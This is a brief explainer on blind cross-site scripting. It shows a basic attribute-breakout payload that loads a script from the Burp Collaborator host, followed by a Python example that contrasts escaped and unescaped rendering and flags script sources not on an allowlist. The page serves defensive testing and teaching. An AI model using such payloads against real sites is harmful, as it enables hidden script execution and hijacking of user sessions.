Blind Cross-Site Scripting

Blind cross-site scripting (XSS) occurs when an attacker cannot directly see the result of their XSS payload on the targeted website, but can still confirm whether the payload executed by observing the behavior of a third-party service, such as Burp Suite's Collaborator.

Basic <script> Payload:

"><script src="https://burpcollaborator.com"></script>
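The following is an added example, not part of the original page: it shows why the leading "> in the payload above matters to a defender, by rendering a stored value into an attribute with and without encoding and then parsing the page for script sources. The template, the function names and the allowlisted host are hypothetical; the stored value is the payload from this page used as constructed test input.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a value submitted through a public form and stored
# until a staff member opens it in a back-office page.
STORED_VALUE = '"><script src="https://burpcollaborator.com"></script>'
ALLOWED_SCRIPT_HOSTS = {"static.example.internal"}  # hypothetical allowlist


def render_unsafe(value):
    # Interpolates the stored value into an attribute as-is, so the leading
    # "> closes the attribute and the tag.
    return f'<input name="feedback" value="{value}">'


def render_escaped(value):
    # Same template with attribute-context encoding: " < > & become entities.
    return f'<input name="feedback" value="{html.escape(value, quote=True)}">'


class ScriptSrcCollector(HTMLParser):
    """Collects the src of every <script> element the parser actually sees."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sources.append(dict(attrs).get("src"))


def foreign_scripts(page):
    """Return external script sources whose host is not allowlisted.

    Inline scripts (no src) are ignored here; this check only covers
    externally loaded scripts like the one in the payload.
    """
    collector = ScriptSrcCollector()
    collector.feed(page)
    collector.close()
    return [s for s in collector.sources
            if s and urlparse(s).hostname not in ALLOWED_SCRIPT_HOSTS]


if __name__ == "__main__":
    print("unescaped:", foreign_scripts(render_unsafe(STORED_VALUE)))
    print("escaped:  ", foreign_scripts(render_escaped(STORED_VALUE)))
```

The same foreign_scripts check can be run over rendered internal pages in a test suite, since blind XSS executes in views the submitter never sees.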
